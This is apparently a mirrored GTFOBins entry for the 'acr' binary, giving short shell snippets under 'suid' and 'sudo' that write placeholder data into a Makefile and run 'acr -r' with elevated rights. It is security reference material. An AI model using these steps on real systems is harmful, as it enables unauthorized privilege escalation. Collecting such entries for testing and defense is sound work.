mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-14 07:42:14 +01:00
16 lines
342 B
Markdown
16 lines
342 B
Markdown
|
---
|
||
|
functions:
|
||
|
suid:
|
||
|
- code: |
|
||
|
sudo install acr $(which acr) .
|
||
|
touch Makefile && chmod + Makefile
|
||
|
echo DATA > Makefile
|
||
|
./acr -r Makefile
|
||
|
sudo:
|
||
|
- code: |
|
||
|
sudo install acr $(which acr) .
|
||
|
touch Makefile && chmod + Makefile
|
||
|
echo DATA > Makefile
|
||
|
sudo acr -r Makefile
|
||
|
---
|